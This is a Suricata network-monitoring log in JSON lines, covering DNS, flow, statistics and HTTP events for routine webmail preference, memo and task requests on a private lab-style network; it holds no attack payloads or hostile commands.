{"timestamp":"2020-02-29T00:00:31.230446+0000","flow_id":987695000028206,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51758,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29261,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:31.336274+0000","flow_id":987695000028206,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51758,"proto":"UDP","dns":{"type":"answer","id":29261,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:31.336274+0000","flow_id":987695000028206,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51758,"proto":"UDP","dns":{"type":"answer","id":29261,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:31.463043+0000","flow_id":1537012727240391,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52634,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:00:31.478809+0000","flow_id":1537012727240391,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52634,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5414}} {"timestamp":"2020-02-29T00:00:34.000269+0000","flow_id":153157065063796,"event_type":"flow","src_ip":"192.168.10.122","src_port":45902,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:33.474484+0000","end":"2020-02-28T23:55:33.585976+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:35.000227+0000","event_type":"stats","stats":{"uptime":13687,"capture":{"kernel_packets":131794,"kernel_drops":0},"decoder":{"pkts":131808,"bytes":91602696,"invalid":175,"ipv4":130393,"ipv6":8,"ethernet":131808,"raw":0,"null":0,"sll":0,"tcp":125458,"udp":4746,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2648,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2664,"synack":2655,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1696,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2162,"failed_udp":106},"tx":{"http":4376,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2238
}},"flow_mgr":{"closed_pruned":2618,"new_pruned":15,"est_pruned":2211,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19177,"memcap_state":0,"memcap_global":0},"http":{"memuse":79802,"memcap":0}}} {"timestamp":"2020-02-29T00:00:36.479921+0000","flow_id":1537012727240391,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52634,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5414},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} {"timestamp":"2020-02-29T00:00:37.879535+0000","flow_id":243338513312687,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43094,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":4163,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:37.984947+0000","flow_id":243338513312687,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43094,"proto":"UDP","dns":{"type":"answer","id":4163,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:37.984947+0000","flow_id":243338513312687,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43094,"proto":"UDP","dns":{"type":"answer","id":4163,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:00:38.081444+0000","flow_id":2150733489452806,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52636,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:00:38.092418+0000","flow_id":2150733489452806,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52636,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5414}} {"timestamp":"2020-02-29T00:00:41.000850+0000","flow_id":812859747239381,"event_type":"flow","src_ip":"192.168.10.122","src_port":57389,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:40.689621+0000","end":"2020-02-28T23:55:40.802671+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:00:42.000177+0000","event_type":"stats","stats":{"uptime":13694,"capture":{"kernel_packets":131820,"kernel_drops":0},"decoder":{"pkts":131829,"bytes":91610721,"invalid":175,"ipv4":130412,"ipv6":8,"ethernet":131829,"raw":0,"null":0,"sll":0,"tcp":125475,"udp":4748,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2649,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2665,"synack":2656,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1697,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2163,"failed_udp":106},"tx":{"http":4377,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2239}},"flow_mgr":{"closed_pruned":2618,"new_pruned":15,"est_pruned":2212,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19176,"memcap_state":0,"memcap_global":0},"http":{"memuse":79860,"memcap":0}}} 
{"timestamp":"2020-02-29T00:00:42.001673+0000","flow_id":973732042355293,"event_type":"flow","src_ip":"192.168.10.122","src_port":51531,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:41.176733+0000","end":"2020-02-28T23:55:41.284558+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:42.391403+0000","flow_id":370778783283435,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53380,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":59919,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:42.497019+0000","flow_id":370778783283435,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53380,"proto":"UDP","dns":{"type":"answer","id":59919,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:42.497019+0000","flow_id":370778783283435,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53380,"proto":"UDP","dns":{"type":"answer","id":59919,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:42.592216+0000","flow_id":2118594249540551,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=modify_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5734}} 
{"timestamp":"2020-02-29T00:00:43.093621+0000","flow_id":2150733489452806,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52636,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5414},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} {"timestamp":"2020-02-29T00:00:44.604989+0000","flow_id":2022601730571069,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59941,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31014,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:44.710471+0000","flow_id":2022601730571069,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59941,"proto":"UDP","dns":{"type":"answer","id":31014,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:44.710471+0000","flow_id":2022601730571069,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59941,"proto":"UDP","dns":{"type":"answer","id":31014,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:44.908834+0000","flow_id":985912589424072,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34688,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task\/save.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu 
Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/nag\/list.php","length":20}} {"timestamp":"2020-02-29T00:00:44.913706+0000","flow_id":1186461792399658,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44196,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":44624,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:45.019117+0000","flow_id":1186461792399658,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44196,"proto":"UDP","dns":{"type":"answer","id":44624,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:45.019117+0000","flow_id":1186461792399658,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44196,"proto":"UDP","dns":{"type":"answer","id":44624,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:45.980555+0000","flow_id":2118594249540551,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34686,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=modify_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5734},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":21109,"tx_id":0}} 
{"timestamp":"2020-02-29T00:00:45.989956+0000","flow_id":2122532734704388,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56423,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31059,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:46.000124+0000","flow_id":2034129418565450,"event_type":"flow","src_ip":"192.168.10.81","src_port":52608,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":751,"bytes_toclient":952,"start":"2020-02-28T23:59:39.898890+0000","end":"2020-02-28T23:59:44.908679+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:46.000341+0000","flow_id":1917856063927441,"event_type":"flow","src_ip":"192.168.10.81","src_port":52606,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":6,"bytes_toserver":747,"bytes_toclient":1857,"start":"2020-02-28T23:59:39.898193+0000","end":"2020-02-28T23:59:44.910626+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:00:46.000416+0000","flow_id":376508265507704,"event_type":"flow","src_ip":"192.168.10.81","src_port":52600,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":742,"bytes_toclient":798,"start":"2020-02-28T23:59:39.895864+0000","end":"2020-02-28T23:59:44.911116+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:46.000484+0000","flow_id":106410657166283,"event_type":"flow","src_ip":"192.168.10.81","src_port":52604,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1839,"bytes_toclient":7040,"start":"2020-02-28T23:59:39.897995+0000","end":"2020-02-28T23:59:44.919065+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:46.000556+0000","flow_id":2223004900341093,"event_type":"flow","src_ip":"192.168.10.81","src_port":52598,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":14,"bytes_toserver":1744,"bytes_toclient":13124,"start":"2020-02-28T23:59:39.734565+0000","end":"2020-02-28T23:59:44.918735+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:00:46.000659+0000","flow_id":1630131894431570,"event_type":"flow","src_ip":"192.168.10.122","src_port":35446,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:55:45.536402+0000","end":"2020-02-28T23:55:45.644702+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:46.000727+0000","flow_id":1669280536703290,"event_type":"flow","src_ip":"192.168.10.81","src_port":52602,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":40,"pkts_toclient":40,"bytes_toserver":3859,"bytes_toclient":50594,"start":"2020-02-28T23:59:39.897338+0000","end":"2020-02-28T23:59:45.052284+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:46.095007+0000","flow_id":2122532734704388,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56423,"proto":"UDP","dns":{"type":"answer","id":31059,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:46.095007+0000","flow_id":2122532734704388,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56423,"proto":"UDP","dns":{"type":"answer","id":31059,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:00:46.141331+0000","flow_id":2118594249540551,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=delete_memos","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=modify_memo","http_method":"GET","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:00:46.155742+0000","flow_id":1206437685387358,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59463,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":20092,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:46.261061+0000","flow_id":1206437685387358,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59463,"proto":"UDP","dns":{"type":"answer","id":20092,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:46.261061+0000","flow_id":1206437685387358,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59463,"proto":"UDP","dns":{"type":"answer","id":20092,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:00:46.311420+0000","flow_id":2118594249540551,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=modify_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3439}} {"timestamp":"2020-02-29T00:00:49.000173+0000","event_type":"stats","stats":{"uptime":13701,"capture":{"kernel_packets":131881,"kernel_drops":0},"decoder":{"pkts":131892,"bytes":91639214,"invalid":176,"ipv4":130475,"ipv6":8,"ethernet":131892,"raw":0,"null":0,"sll":0,"tcp":125527,"udp":4758,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2651,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2667,"synack":2658,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1699,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2168,"failed_udp":106},"tx":{"http":4381,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2244}},"flow_mgr":{"cl
osed_pruned":2624,"new_pruned":15,"est_pruned":2215,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65532,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20170,"memcap_state":0,"memcap_global":0},"http":{"memuse":54466,"memcap":0}}} {"timestamp":"2020-02-29T00:00:51.000587+0000","flow_id":1764268018371447,"event_type":"flow","src_ip":"192.168.10.122","src_port":43607,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:50.134007+0000","end":"2020-02-28T23:55:50.242455+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:51.002278+0000","flow_id":1372824699014401,"event_type":"flow","src_ip":"192.168.10.122","src_port":36975,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:55:50.396545+0000","end":"2020-02-28T23:55:50.504392+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:51.314253+0000","flow_id":2118594249540551,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34686,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=modify_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3439},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":16944,"tx_id":2}} 
{"timestamp":"2020-02-29T00:00:52.000622+0000","flow_id":931516809444240,"event_type":"flow","src_ip":"192.168.10.122","src_port":37867,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:51.686992+0000","end":"2020-02-28T23:55:51.794880+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:55.000149+0000","flow_id":423121546112077,"event_type":"flow","src_ip":"192.168.10.81","src_port":52610,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":20,"pkts_toclient":23,"bytes_toserver":4627,"bytes_toclient":18466,"start":"2020-02-28T23:59:47.060493+0000","end":"2020-02-28T23:59:53.055087+0000","age":6,"state":"closed","reason":"timeout","alerted":true},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 